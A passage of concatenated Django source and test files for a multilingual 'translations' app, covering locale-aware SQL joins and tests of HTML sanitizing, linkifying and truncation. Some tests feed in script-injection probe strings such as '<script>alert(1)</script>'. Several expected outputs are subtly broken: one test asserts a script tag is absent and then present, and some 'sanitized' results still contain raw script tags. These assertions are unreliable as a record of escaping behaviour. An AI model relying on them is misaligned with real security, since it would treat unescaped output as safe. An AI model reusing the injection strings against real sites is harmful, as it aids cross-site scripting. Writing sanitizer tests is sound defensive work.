cleaned, callbacks=[lambda attrs, new: {'_text': ''}])
# Third pass: now strip links (only links will be stripped, other
# forbidden tags are already bleached/escaped.
allowed_tags = self.allowed_tags[:] # Make a copy.
allowed_tags.remove('a')
return bleach.clean(emptied_links, tags=allowed_tags, strip=True)
class NoLinksTranslation(NoLinksMixin, PurifiedTranslation):
"""Run the string through bleach, escape markup and strip all the links."""
class Meta:
proxy = True
class NoLinksNoMarkupTranslation(NoLinksMixin, LinkifiedTranslation):
"""Run the string through bleach, escape markup and strip all the links."""
class Meta:
proxy = True
class TranslationSequence(models.Model):
"""
The translations_seq table, so syncdb will create it during testing.
"""
id = models.IntegerField(primary_key=True)
class Meta:
db_table = 'translations_seq'
def delete_translation(obj, fieldname):
field = obj._meta.get_field(fieldname)
trans_id = getattr(obj, field.attname)
obj.update(**{field.name: None})
if trans_id:
Translation.objects.filter(id=trans_id).delete()
########NEW FILE########
__FILENAME__ = query
import itertools
from django.conf import settings
from django.db import models
from django.utils import translation as translation_utils
import addons.query
def order_by_translation(qs, fieldname):
"""
Order the QuerySet by the translated field, honoring the current and
fallback locales. Returns a new QuerySet.
The model being sorted needs a get_fallback() classmethod that describes
the fallback locale. get_fallback() can return a string or a Field.
"""
if fieldname.startswith('-'):
desc = True
fieldname = fieldname[1:]
else:
desc = False
qs = qs.all()
model = qs.model
field = model._meta.get_field(fieldname)
# connection is a tuple (lhs, table, join_cols)
connection = (model._meta.db_table, field.rel.to._meta.db_table,
field.rel.field_name)
# Doing the manual joins is flying under Django's radar, so we need to make
# sure the initial alias (the main table) is set up.
if not qs.query.tables:
qs.query.get_initial_alias()
# Force two new (reuse is an empty set) LEFT OUTER JOINs against the
# translation table, without reusing any aliases. We'll hook up the
# language fallbacks later.
qs.query = qs.query.clone(TranslationQuery)
t1 = qs.query.join(connection, join_field=field,
outer_if_first=True, reuse=set())
t2 = qs.query.join(connection, join_field=field,
outer_if_first=True, reuse=set())
qs.query.translation_aliases = {field: (t1, t2)}
f1, f2 = '%s.`localized_string`' % t1, '%s.`localized_string`' % t2
name = 'translated_%s' % field.column
ifnull = 'IFNULL(%s, %s)' % (f1, f2)
prefix = '-' if desc else ''
return qs.extra(select={name: ifnull},
where=['(%s IS NOT NULL OR %s IS NOT NULL)' % (f1, f2)],
order_by=[prefix + name])
class TranslationQuery(addons.query.IndexQuery):
"""
Overrides sql.Query to hit our special compiler that knows how to JOIN
translations.
"""
def clone(self, klass=None, **kwargs):
# Maintain translation_aliases across clones.
c = super(TranslationQuery, self).clone(klass, **kwargs)
c.translation_aliases = self.translation_aliases
return c
def get_compiler(self, using=None, connection=None):
# Call super to figure out using and connection.
c = super(TranslationQuery, self).get_compiler(using, connection)
return SQLCompiler(self, c.connection, c.using)
class SQLCompiler(addons.query.IndexCompiler):
"""Overrides get_from_clause to LEFT JOIN translations with a locale."""
def get_from_clause(self):
# Temporarily remove translation tables from query.tables so Django
# doesn't create joins against them.
old_tables = list(self.query.tables)
for table in itertools.chain(*self.query.translation_aliases.values()):
self.query.tables.remove(table)
joins, params = super(SQLCompiler, self).get_from_clause()
# fallback could be a string locale or a model field.
params.append(translation_utils.get_language())
if hasattr(self.query.model, 'get_fallback'):
fallback = self.query.model.get_fallback()
else:
fallback = settings.LANGUAGE_CODE
if not isinstance(fallback, models.Field):
params.append(fallback)
# Add our locale-aware joins. We're not respecting the table ordering
# Django had in query.tables, but that seems to be ok.
for field, aliases in self.query.translation_aliases.items():
t1, t2 = aliases
joins.append(self.join_with_locale(t1))
joins.append(self.join_with_locale(t2, fallback))
self.query.tables = old_tables
return joins, params
def join_with_locale(self, alias, fallback=None):
# This is all lifted from the real sql.compiler.get_from_clause(),
# except for the extra AND clause. Fun project: fix Django to use Q
# objects here instead of a bunch of strings.
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
mapping = self.query.alias_map[alias]
# name, alias, join_type, lhs, lhs_col, col, nullable = mapping
name, alias, join_type, lhs, join_cols, _, join_field = mapping
lhs_col = join_field.column
rhs_col = join_cols
alias_str = '' if alias == name else (' %s' % alias)
if isinstance(fallback, models.Field):
fallback_str = '%s.%s' % (qn(self.query.model._meta.db_table),
qn(fallback.column))
else:
fallback_str = '%s'
return ('%s %s%s ON (%s.%s = %s.%s AND %s.%s = %s)' %
(join_type, qn(name), alias_str,
qn(lhs), qn2(lhs_col), qn(alias), qn2(rhs_col),
qn(alias), qn('locale'), fallback_str))
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField)
class TranslatedModel(amo.models.ModelBase):
name = TranslatedField()
description = TranslatedField()
default_locale = models.CharField(max_length=10)
no_locale = TranslatedField(require_locale=False)
models.signals.pre_save.connect(save_signal, sender=TranslatedModel,
dispatch_uid='testapp_translatedmodel')
class UntranslatedModel(amo.models.ModelBase):
"""Make sure nothing is broken when a model doesn't have translations."""
number = models.IntegerField()
class FancyModel(amo.models.ModelBase):
"""Mix it up with purified and linkified fields."""
purified = PurifiedField()
linkified = LinkifiedField()
models.signals.pre_save.connect(save_signal, sender=FancyModel,
dispatch_uid='testapp_fancymodel')
########NEW FILE########
__FILENAME__ = test_forms
from pyquery import PyQuery as pq
from nose.tools import eq_
from django.forms import ModelForm
import amo.tests
from translations import forms, fields
from translations.tests.testapp.models import TranslatedModel
class TestForm(forms.TranslationFormMixin, ModelForm):
name = fields.TransField()
class Meta:
model = TranslatedModel
class TestTranslationFormMixin(amo.tests.TestCase):
def test_default_locale(self):
obj = TranslatedModel()
obj.get_fallback = lambda: 'pl'
f = TestForm(instance=obj)
eq_(f.fields['name'].default_locale, 'pl')
eq_(f.fields['name'].widget.default_locale, 'pl')
eq_(pq(f.as_p())('input:not([lang=init])').attr('lang'), 'pl')
########NEW FILE########
__FILENAME__ = test_helpers
from django.conf import settings
from django.utils import translation
import jingo
from mock import Mock, patch
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from translations import helpers
from translations.fields import save_signal
from translations.models import PurifiedTranslation
from translations.tests.testapp.models import TranslatedModel
def super():
jingo.load_helpers()
def test_locale_html():
"""Test HTML attributes for languages different than the site language"""
testfield = Mock()
# same language: no need for attributes
this_lang = translation.get_language()
testfield.locale = this_lang
s = helpers.locale_html(testfield)
assert not s, 'no special HTML attributes for site language'
# non-rtl language
testfield.locale = 'de'
s = helpers.locale_html(testfield)
eq_(s, ' lang="de" dir="ltr"')
# rtl language
for lang in settings.RTL_LANGUAGES:
testfield.locale = lang
s = helpers.locale_html(testfield)
eq_(s, ' lang="%s" dir="rtl"' % testfield.locale)
def test_locale_html_xss():
"""Test for nastiness-removal in the transfield's locale"""
testfield = Mock()
# same language: no need for attributes
testfield.locale = '<script>alert(1)</script>'
s = helpers.locale_html(testfield)
assert '<script>' not in s
assert '<script>alert(1)</script>' in s
def test_empty_locale_html():
"""locale_html must still work if field is None."""
s = helpers.locale_html(None)
assert not s, 'locale_html on None must be empty.'
def test_truncate_purified_field():
s = '<i>one</i><i>two</i>'
t = PurifiedTranslation(localized_string=s)
actual = jingo.env.from_string('{{ s|truncate(6) }}').render({'s': t})
eq_(actual, s)
def test_truncate_purified_field_xss():
"""Truncating should not introduce xss issues."""
s = 'safe <script>alert("omg")</script>'
t = PurifiedTranslation(localized_string=s)
actual = jingo.env.from_string('{{ s|truncate(100) }}').render({'s': t})
eq_(actual, 'safe <script>alert("omg")</script>')
actual = jingo.env.from_string('{{ s|truncate(5) }}').render({'s': t})
eq_(actual, 'safe ...')
def test_clean():
# Links are not mangled, bad HTML is escaped, newlines are slimmed.
s = '<ul><li><a href="#woo">\n\nyeah</a></li>\n\n<li><script></li></ul>'
eq_(helpers.clean(s),
'<ul><li><a href="#woo">\n\nyeah</a></li><li><script></li></ul>')
def test_clean_in_template():
s = '<a href="#woo">yeah</a>'
eq_(jingo.env.from_string('{{ s|clean }}').render({'s': s}), s)
def test_no_links():
s = 'a <a href="http://url.link">http://example.com</a>, http://text.link'
eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}),
'a http://example.com, http://text.link')
# Bad markup.
s = '<http://bad.markup.com'
eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}), '')
# Bad markup.
s = 'some text <http://bad.markup.com'
eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}),
'some text')
def test_l10n_menu():
# No remove_locale_url provided.
menu = helpers.l10n_menu({})
assert 'data-rm-locale=""' in menu, menu
# Specific remove_locale_url provided (eg for user).
menu = helpers.l10n_menu({}, remove_locale_url='/some/url/')
assert 'data-rm-locale="/some/url/"' in menu, menu
# Use the remove_locale_url taken from the addon in the context.
menu = helpers.l10n_menu({'addon': Addon()},
remove_locale_url='some/url/')
assert 'data-rm-locale="/developers/addon/None/rmlocale"' in menu, menu
@patch.object(settings, 'AMO_LANGUAGES', ('de', 'en-US', 'es', 'fr', 'pt-BR'))
class TestAllLocales(amo.tests.TestCase):
def test_all_locales_none(self):
addon = None
field_name = 'description'
eq_(helpers.all_locales(addon, field_name), None)
addon = Mock()
field_name = 'description'
del addon.description
eq_(helpers.all_locales(addon, field_name), None)
def test_all_locales(self):
obj = TranslatedModel()
obj.description = {
'en-US': 'There',
'es': 'Is No',
'fr': 'Spoon'
}
# Pretend the TranslateModel instance was saved to force Translation
# objects to be saved.
save_signal(sender=TranslatedModel, instance=obj)
result = helpers.all_locales(obj, 'description')
assert u'<div class="trans" data-name="description">' in result
assert u'<span lang="en-us">There</span>' in result
assert u'<span lang="es">Is No</span>' in result
assert u'<span lang="fr">Spoon</span>' in result
def test_all_locales_empty(self):
obj = TranslatedModel()
obj.description = {
'en-US': 'There',
'es': 'Is No',
'fr': ''
}
# Pretend the TranslateModel instance was saved to force Translation
# objects to be saved.
save_signal(sender=TranslatedModel, instance=obj)
result = helpers.all_locales(obj, 'description')
assert u'<div class="trans" data-name="description">' in result
assert u'<span lang="en-us">There</span>' in result
assert u'<span lang="es">Is No</span>' in result
assert u'<span lang="fr"></span>' in result
result = helpers.all_locales(obj, 'description', prettify_empty=True)
assert u'<div class="trans" data-name="description">' in result
assert u'<span lang="en-us">There</span>' in result
assert u'<span lang="es">Is No</span>' in result
assert u'<span class="empty" lang="fr">None</span>' in result
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
from contextlib import nested
import django
from django.conf import settings
from django.db import connections, reset_queries
from django.test.utils import override_settings
from django.utils import translation
from django.utils.functional import lazy
import jinja2
import multidb
from mock import patch
from nose import SkipTest
from nose.tools import eq_
from test_utils import trans_eq, TestCase
from testapp.models import TranslatedModel, UntranslatedModel, FancyModel
from translations import widgets
from translations.query import order_by_translation
from translations.models import (LinkifiedTranslation, NoLinksTranslation,
NoLinksNoMarkupTranslation,
PurifiedTranslation, Translation,
TranslationSequence)
def ids(qs):
return [o.id for o in qs]
class TranslationFixturelessTestCase(TestCase):
"We want to be able to rollback stuff."
def test_whitespace(self):
t = Translation(localized_string=' khaaaaaan! ', id=999)
t.save()
eq_('khaaaaaan!', t.localized_string)
class TranslationSequenceTestCase(TestCase):
"""
Make sure automatic translation sequence generation works
as expected.
"""
def test_empty_translations_seq(self):
"""Make sure we can handle an empty translation sequence table."""
TranslationSequence.objects.all().delete()
newtrans = Translation.new('abc', 'en-us')
newtrans.save()
assert newtrans.id > 0, (
'Empty translation table should still generate an ID.')
def test_single_translation_sequence(self):
"""Make sure we only ever have one translation sequence."""
TranslationSequence.objects.all().delete()
eq_(TranslationSequence.objects.count(), 0)
for i in range(5):
newtrans = Translation.new(str(i), 'en-us')
newtrans.save()
eq_(TranslationSequence.objects.count(), 1)
def test_translation_sequence_increases(self):
"""Make sure translation sequence increases monotonically."""
newtrans1 = Translation.new('abc', 'en-us')
newtrans1.save()
newtrans2 = Translation.new('def', 'de')
newtrans2.save()
assert newtrans2.pk > newtrans1.pk, (
'Translation sequence needs to keep increasing.')
class TranslationTestCase(TestCase):
fixtures = ['testapp/test_models.json']
def setUp(self):
super(TranslationTestCase, self).setUp()
self.redirect_url = settings.REDIRECT_URL
self.redirect_secret_key = settings.REDIRECT_SECRET_KEY
settings.REDIRECT_URL = None
settings.REDIRECT_SECRET_KEY = 'sekrit'
translation.activate('en-US')
def tearDown(self):
super(TranslationTestCase, self).tearDown()
settings.REDIRECT_URL = self.redirect_url
settings.REDIRECT_SECRET_KEY = self.redirect_secret_key
def test_meta_translated_fields(self):
assert not hasattr(UntranslatedModel._meta, 'translated_fields')
eq_(set(TranslatedModel._meta.translated_fields),
set([TranslatedModel._meta.get_field('no_locale'),
TranslatedModel._meta.get_field('name'),
TranslatedModel._meta.get_field('description')]))
eq_(set(FancyModel._meta.translated_fields),
set([FancyModel._meta.get_field('purified'),
FancyModel._meta.get_field('linkified')]))
def test_fetch_translations(self):
"""Basic check of fetching translations in the current locale."""
o = TranslatedModel.objects.get(id=1)
trans_eq(o.name, 'some name', 'en-US')
trans_eq(o.description, 'some description', 'en-US')
def test_fetch_no_translations(self):
"""Make sure models with no translations aren't harmed."""
o = UntranslatedModel.objects.get(id=1)
eq_(o.number, 17)
def test_fetch_translation_de_locale(self):
"""Check that locale fallbacks work."""
try:
translation.activate('de')
o = TranslatedModel.objects.get(id=1)
trans_eq(o.name, 'German!! (unst unst)', 'de')
trans_eq(o.description, 'some description', 'en-US')
finally:
translation.deactivate()
def test_create_translation(self):
o = TranslatedModel.objects.create(name='english name')
get_model = lambda: TranslatedModel.objects.get(id=o.id)
trans_eq(o.name, 'english name', 'en-US')
eq_(o.description, None)
# Make sure the translation id is stored on the model, not the autoid.
eq_(o.name.id, o.name_id)
# Check that a different locale creates a new row with the same id.
translation.activate('de')
german = get_model()
trans_eq(o.name, 'english name', 'en-US')
german.name = u'Gemütlichkeit name'
german.description = u'clöüserw description'
german.save()
trans_eq(german.name, u'Gemütlichkeit name', 'de')
trans_eq(german.description, u'clöüserw description', 'de')
# ids should be the same, autoids are different.
eq_(o.name.id, german.name.id)
assert o.name.autoid != german.name.autoid
# Check that de finds the right translation.
fresh_german = get_model()
trans_eq(fresh_german.name, u'Gemütlichkeit name', 'de')
trans_eq(fresh_german.description, u'clöüserw description', 'de')
# Check that en-US has the right translations.
translation.deactivate()
english = get_model()
trans_eq(english.name, 'english name', 'en-US')
english.debug = True
eq_(english.description, None)
english.description = 'english description'
english.save()
fresh_english = get_model()
trans_eq(fresh_english.description, 'english description', 'en-US')
eq_(fresh_english.description.id, fresh_german.description.id)
def test_update_translation(self):
o = TranslatedModel.objects.get(id=1)
translation_id = o.name.autoid
o.name = 'new name'
o.save()
o = TranslatedModel.objects.get(id=1)
trans_eq(o.name, 'new name', 'en-US')
# Make sure it was an update, not an insert.
eq_(o.name.autoid, translation_id)
def test_create_with_dict(self):
# Set translations with a dict.
strings = {'en-US': 'right language', 'de': 'wrong language'}
o = TranslatedModel.objects.create(name=strings)
# Make sure we get the English text since we're in en-US.
trans_eq(o.name, 'right language', 'en-US')
# Check that de was set.
translation.activate('de')
o = TranslatedModel.objects.get(id=o.id)
trans_eq(o.name, 'wrong language', 'de')
# We're in de scope, so we should see the de text.
de = TranslatedModel.objects.create(name=strings)
trans_eq(o.name, 'wrong language', 'de')
# Make sure en-US was still set.
translation.deactivate()
o = TranslatedModel.objects.get(id=de.id)
trans_eq(o.name, 'right language', 'en-US')
def test_update_with_dict(self):
# There's existing en-US and de strings.
strings = {'de': None, 'fr': 'oui'}
get_model = lambda: TranslatedModel.objects.get(id=1)
# Don't try checking that the model's name value is en-US. It will be
# one of the other locales, but we don't know which one. You just set
# the name to a dict, deal with it.
m = get_model()
m.name = strings
m.save()
# en-US was not touched.
trans_eq(get_model().name, 'some name', 'en-US')
# de was updated to NULL, so it falls back to en-US.
translation.activate('de')
trans_eq(get_model().name, 'some name', 'en-US')
# fr was added.
translation.activate('fr')
trans_eq(get_model().name, 'oui', 'fr')
def test_dict_with_hidden_locale(self):
with self.settings(HIDDEN_LANGUAGES=('xxx',)):
o = TranslatedModel.objects.get(id=1)
o.name = {'en-US': 'active language', 'xxx': 'hidden language',
'de': 'another language'}
o.save()
ts = Translation.objects.filter(id=o.name_id)
eq_(sorted(ts.values_list('locale', flat=True)),
['de', 'en-US', 'xxx'])
def test_dict_bad_locale(self):
m = TranslatedModel.objects.get(id=1)
m.name = {'de': 'oof', 'xxx': 'bam', 'es': 'si'}
m.save()
ts = Translation.objects.filter(id=m.name_id)
eq_(sorted(ts.values_list('locale', flat=True)),
['de', 'en-US', 'es'])
def test_sorting(self):
"""Test translation comparisons in Python code."""
b = Translation.new('bbbb', 'de')
a = Translation.new('aaaa', 'de')
c = Translation.new('cccc', 'de')
eq_(sorted([c, a, b]), [a, b, c])
def test_sorting_en(self):
q = TranslatedModel.objects.all()
expected = [4, 1, 3]
eq_(ids(order_by_translation(q, 'name')), expected)
eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))
def test_sorting_mixed(self):
translation.activate('de')
q = TranslatedModel.objects.all()
expected = [1, 4, 3]
eq_(ids(order_by_translation(q, 'name')), expected)
eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))
def test_sorting_by_field(self):
field = TranslatedModel._meta.get_field('default_locale')
TranslatedModel.get_fallback = classmethod(lambda cls: field)
translation.activate('de')
q = TranslatedModel.objects.all()
expected = [3, 1, 4]
eq_(ids(order_by_translation(q, 'name')), expected)
eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))
del TranslatedModel.get_fallback
def test_new_purified_field(self):
# This is not a full test of the html sanitizing. We expect the
# underlying bleach library to have full tests.
s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
m = FancyModel.objects.create(purified=s)
eq_(m.purified.localized_string_clean,
'<a rel="nofollow" href="http://xxx.com">yay</a> '
'<i><a rel="nofollow" href="http://yyy.com">'
'http://yyy.com</a></i>')
eq_(m.purified.localized_string, s)
def test_new_linkified_field(self):
s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
m = FancyModel.objects.create(linkified=s)
eq_(m.linkified.localized_string_clean,
'<a rel="nofollow" href="http://xxx.com">yay</a> '
'<i><a rel="nofollow" href="http://yyy.com">'
'http://yyy.com</a></i>')
eq_(m.linkified.localized_string, s)
def test_update_purified_field(self):
m = FancyModel.objects.get(id=1)
s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
m.purified = s
m.save()
eq_(m.purified.localized_string_clean,
'<a rel="nofollow" href="http://xxx.com">yay</a> '
'<i><a rel="nofollow" href="http://yyy.com">'
'http://yyy.com</a></i>')
eq_(m.purified.localized_string, s)
def test_update_linkified_field(self):
m = FancyModel.objects.get(id=1)
s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
m.linkified = s
m.save()
eq_(m.linkified.localized_string_clean,
'<a rel="nofollow" href="http://xxx.com">yay</a> '
'<i><a rel="nofollow" href="http://yyy.com">'
'http://yyy.com</a></i>')
eq_(m.linkified.localized_string, s)
def test_purified_field_str(self):
m = FancyModel.objects.get(id=1)
eq_(u'%s' % m.purified,
'<i>x</i> '
'<a rel="nofollow" href="http://yyy.com">http://yyy.com</a>')
def test_linkified_field_str(self):
m = FancyModel.objects.get(id=1)
eq_(u'%s' % m.linkified,
'<i>x</i> '
'<a rel="nofollow" href="http://yyy.com">http://yyy.com</a>')
def test_purifed_linkified_fields_in_template(self):
m = FancyModel.objects.get(id=1)
env = jinja2.Environment()
t = env.from_string('{{ m.purified }}=={{ m.linkified }}')
s = t.render({'m': m})
eq_(s, u'%s==%s' % (m.purified.localized_string_clean,
m.linkified.localized_string_clean))
def test_outgoing_url(self):
"""
Make sure linkified field is properly bounced off our outgoing URL
redirector.
"""
settings.REDIRECT_URL = 'http://example.com/'
s = 'I like http://example.org/awesomepage.html .'
m = FancyModel.objects.create(linkified=s)
eq_(m.linkified.localized_string_clean,
'I like <a rel="nofollow" href="http://example.com/'
'40979175e3ef6d7a9081085f3b99f2f05447b22ba790130517dd62b7ee59ef94/'
'http%3A//example.org/'
'awesomepage.html">http://example.org/awesomepage'
'.html</a> .')
eq_(m.linkified.localized_string, s)
def test_require_locale(self):
obj = TranslatedModel.objects.get(id=1)
eq_(unicode(obj.no_locale), 'blammo')
eq_(obj.no_locale.locale, 'en-US')
# Switch the translation to a locale we wouldn't pick up by default.
obj.no_locale.locale = 'fr'
obj.no_locale.save()
obj = TranslatedModel.objects.get(id=1)
eq_(unicode(obj.no_locale), 'blammo')
eq_(obj.no_locale.locale, 'fr')
def test_delete_set_null(self):
"""
Test that deleting a translation sets the corresponding FK to NULL,
if it was the only translation for this field.
"""
obj = TranslatedModel.objects.get(id=1)
trans_id = obj.description.id
eq_(Translation.objects.filter(id=trans_id).count(), 1)
obj.description.delete()
obj = TranslatedModel.objects.no_cache().get(id=1)
eq_(obj.description_id, None)
eq_(obj.description, None)
eq_(Translation.objects.no_cache().filter(id=trans_id).exists(), False)
@patch.object(TranslatedModel, 'get_fallback', create=True)
def test_delete_keep_other_translations(self, get_fallback):
# To make sure both translations for the name are used, set the
# fallback to the second locale, which is 'de'.
get_fallback.return_value = 'de'
obj = TranslatedModel.objects.get(id=1)
orig_name_id = obj.name.id
eq_(obj.name.locale.lower(), 'en-us')
eq_(Translation.objects.filter(id=orig_name_id).count(), 2)
obj.name.delete()
obj = TranslatedModel.objects.no_cache().get(id=1)
eq_(Translation.objects.no_cache().filter(id=orig_name_id).count(), 1)
# We shouldn't have set name_id to None.
eq_(obj.name_id, orig_name_id)
# We should find a Translation.
eq_(obj.name.id, orig_name_id)
eq_(obj.name.locale, 'de')
class TranslationMultiDbTests(TestCase):
fixtures = ['testapp/test_models.json']
def setUp(self):
super(TranslationMultiDbTests, self).setUp()
translation.activate('en-US')
def tearDown(self):
self.cleanup_fake_connections()
super(TranslationMultiDbTests, self).tearDown()
@property
def mocked_dbs(self):
return {
'default': settings.DATABASES['default'],
'slave-1': settings.DATABASES['default'].copy(),
'slave-2': settings.DATABASES['default'].copy(),
}
def cleanup_fake_connections(self):
with patch.object(django.db.connections, 'databases', self.mocked_dbs):
for key in ('default', 'slave-1', 'slave-2'):
connections[key].close()
@override_settings(DEBUG=True)
def test_translations_queries(self):
# Make sure we are in a clean environnement.
reset_queries()
TranslatedModel.objects.get(pk=1)
eq_(len(connections['default'].queries), 3)
@override_settings(DEBUG=True)
def test_translations_reading_from_multiple_db(self):
with patch.object(django.db.connections, 'databases', self.mocked_dbs):
# Make sure we are in a clean environnement.
reset_queries()
with patch('multidb.get_slave', lambda: 'slave-2'):
TranslatedModel.objects.get(pk=1)
eq_(len(connections['default'].queries), 0)
eq_(len(connections['slave-1'].queries), 0)
eq_(len(connections['slave-2'].queries), 3)
@override_settings(DEBUG=True)
def test_translations_reading_from_multiple_db_using(self):
raise SkipTest('Will need a django-queryset-transform patch to work')
with patch.object(django.db.connections, 'databases', self.mocked_dbs):
# Make sure we are in a clean environnement.
reset_queries()
with patch('multidb.get_slave', lambda: 'slave-2'):
TranslatedModel.objects.using('slave-1').get(pk=1)
eq_(len(connections['default'].queries), 0)
eq_(len(connections['slave-1'].queries), 3)
eq_(len(connections['slave-2'].queries), 0)
@override_settings(DEBUG=True)
def test_translations_reading_from_multiple_db_pinning(self):
with patch.object(django.db.connections, 'databases', self.mocked_dbs):
# Make sure we are in a clean environnement.
reset_queries()
with nested(patch('multidb.get_slave', lambda: 'slave-2'),
multidb.pinning.use_master):
TranslatedModel.objects.get(pk=1)
eq_(len(connections['default'].queries), 3)
eq_(len(connections['slave-1'].queries), 0)
eq_(len(connections['slave-2'].queries), 0)
class PurifiedTranslationTest(TestCase):
def test_output(self):
assert isinstance(PurifiedTranslation().__html__(), unicode)
def test_raw_text(self):
s = u' This is some text '
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(), 'This is some text')
def test_allowed_tags(self):
s = u'<b>bold text</b> or <code>code</code>'
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(), u'<b>bold text</b> or <code>code</code>')
def test_forbidden_tags(self):
s = u'<script>some naughty xss</script>'
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(), '<script>some naughty xss</script>')
def test_internal_link(self):
s = u'<b>markup</b> <a href="http://addons.mozilla.org/foo">bar</a>'
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(),
u'<b>markup</b> <a rel="nofollow" '
u'href="http://addons.mozilla.org/foo">bar</a>')
@patch('amo.urlresolvers.get_outgoing_url')
def test_external_link(self, get_outgoing_url_mock):
get_outgoing_url_mock.return_value = 'http://external.url'
s = u'<b>markup</b> <a href="http://example.com">bar</a>'
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(),
u'<b>markup</b> <a rel="nofollow" '
u'href="http://external.url">bar</a>')
@patch('amo.urlresolvers.get_outgoing_url')
def test_external_text_link(self, get_outgoing_url_mock):
get_outgoing_url_mock.return_value = 'http://external.url'
s = u'<b>markup</b> http://example.com'
x = PurifiedTranslation(localized_string=s)
eq_(x.__html__(),
u'<b>markup</b> <a rel="nofollow" '
u'href="http://external.url">http://example.com</a>')
class LinkifiedTranslationTest(TestCase):
@patch('amo.urlresolvers.get_outgoing_url')
def test_allowed_tags(self, get_outgoing_url_mock):
get_outgoing_url_mock.return_value = 'http://external.url'
s = u'<a href="http://example.com">bar</a>'
x = LinkifiedTranslation(localized_string=s)
eq_(x.__html__(),
u'<a rel="nofollow" href="http://external.url">bar</a>')
def test_forbidden_tags(self):
s = u'<script>some naughty xss</script> <b>bold</b>'
x = LinkifiedTranslation(localized_string=s)
eq_(x.__html__(),
'<script>some naughty xss</script> '
'<b>bold</b>')
class NoLinksTranslationTest(TestCase):
def test_allowed_tags(self):
s = u'<b>bold text</b> or <code>code</code>'
x = NoLinksTranslation(localized_string=s)
eq_(x.__html__(), u'<b>bold text</b> or <code>code</code>')
def test_forbidden_tags(self):
s = u'<script>some naughty xss</script>'
x = NoLinksTranslation(localized_string=s)
eq_(x.__html__(), '<script>some naughty xss</script>')
def test_links_stripped(self):
# Link with markup.
s = u'a <a href="http://example.com">link</a> with markup'
x = NoLinksTranslation(localized_string=s)
eq_(x.__html__(), u'a with markup')
# Text link.
s = u'a text http://example.com link'
x = NoLinksTranslation(localized_string=s)
eq_(x.__html__(), u'a text link')
# Text link, markup link, allowed tags, forbidden tags and bad markup.
s = (u'a <a href="http://example.com">link</a> with markup, a text '
u'http://example.com link, <b>with allowed tags</b>, '
u'<script>forbidden tags</script> and <http://bad.markup.com')
x = NoLinksTranslation(localized_string=s)
eq_(x.__html__(), u'a with markup, a text link, '
u'<b>with allowed tags</b>, '
u'<script>forbidden tags</script> and')
class NoLinksNoMarkupTranslationTest(TestCase):
def test_forbidden_tags(self):
s = u'<script>some naughty xss</script> <b>bold</b>'
x = NoLinksNoMarkupTranslation(localized_string=s)
eq_(x.__html__(),
'<script>some naughty xss</script> '
'<b>bold</b>')
def test_links_stripped(self):
# Link with markup.
s = u'a <a href="http://example.com">link</a> with markup'
x = NoLinksNoMarkupTranslation(localized_string=s)
eq_(x.__html__(), u'a with markup')
# Text link.
s = u'a text http://example.com link'
x = NoLinksNoMarkupTranslation(localized_string=s)
eq_(x.__html__(), u'a text link')
# Text link, markup link, forbidden tags and bad markup.
s = (u'a <a href="http://example.com">link</a> with markup, a text '
u'http://example.com link, <b>with forbidden tags</b>, '
u'<script>forbidden tags</script> and <http://bad.markup.com')
x = NoLinksNoMarkupTranslation(localized_string=s)
eq_(x.__html__(), u'a with markup, a text link, '
u'<b>with forbidden tags</b>, '
u'<script>forbidden tags</script> and')
def test_translation_bool():
t = lambda s: Translation(localized_string=s)
assert bool(t('text')) is True
assert bool(t(' ')) is False
assert bool(t('')) is False
assert bool(t(None)) is False
def test_translation_unicode():
t = lambda s: Translation(localized_string=s)
eq_(unicode(t('hello')), 'hello')
eq_(unicode(t(None)), '')
def test_widget_value_from_datadict():
data = {'f_en-US': 'woo', 'f_de': 'herr', 'f_fr_delete': ''}
actual = widgets.TransMulti().value_from_datadict(data, [], 'f')
expected = {'en-US': 'woo', 'de': 'herr', 'fr': None}
eq_(actual, expected)
def test_comparison_with_lazy():
x = Translation(localized_string='xxx')
lazy_u = lazy(lambda x: x, unicode)
x == lazy_u('xxx')
lazy_u('xxx') == x
def test_cache_key():
# Test that we are not taking the db into account when building our
# cache keys for django-cache-machine. See bug 928881.
eq_(Translation._cache_key(1, 'default'),
Translation._cache_key(1, 'slave'))
# Test that we are using the same cache no matter what Translation class
# we use.
eq_(PurifiedTranslation._cache_key(1, 'default'),
Translation._cache_key(1, 'default'))
eq_(LinkifiedTranslation._cache_key(1, 'default'),
Translation._cache_key(1, 'default'))
########NEW FILE########
__FILENAME__ = test_util
from nose.tools import eq_
from translations.models import Translation
from translations.utils import transfield_changed, truncate, truncate_text
def test_truncate_text():
eq_(truncate_text('foobar', 5), ('...', 0))
eq_(truncate_text('foobar', 5, True), ('fooba...', 0))
eq_(truncate_text('foobar', 5, True, 'xxx'), ('foobaxxx', 0))
eq_(truncate_text('foobar', 6), ('foobar...', 0))
eq_(truncate_text('foobar', 7), ('foobar', 1))
def test_truncate():
s = ' <p>one</p><ol><li>two</li><li> three</li> </ol> four <p>five</p>'
eq_(truncate(s, 100), s)
eq_(truncate(s, 6), '<p>one</p><ol><li>two...</li></ol>')
eq_(truncate(s, 5, True), '<p>one</p><ol><li>tw...</li></ol>')
eq_(truncate(s, 11), '<p>one</p><ol><li>two</li><li>three...</li></ol>')
eq_(truncate(s, 15),
'<p>one</p><ol><li>two</li><li>three</li></ol>four...')
eq_(truncate(s, 13, True, 'xxx'),
'<p>one</p><ol><li>two</li><li>three</li></ol>foxxx')
def test_transfield_changed():
initial = {
'some_field': 'some_val',
'name_en-us': Translation.objects.create(
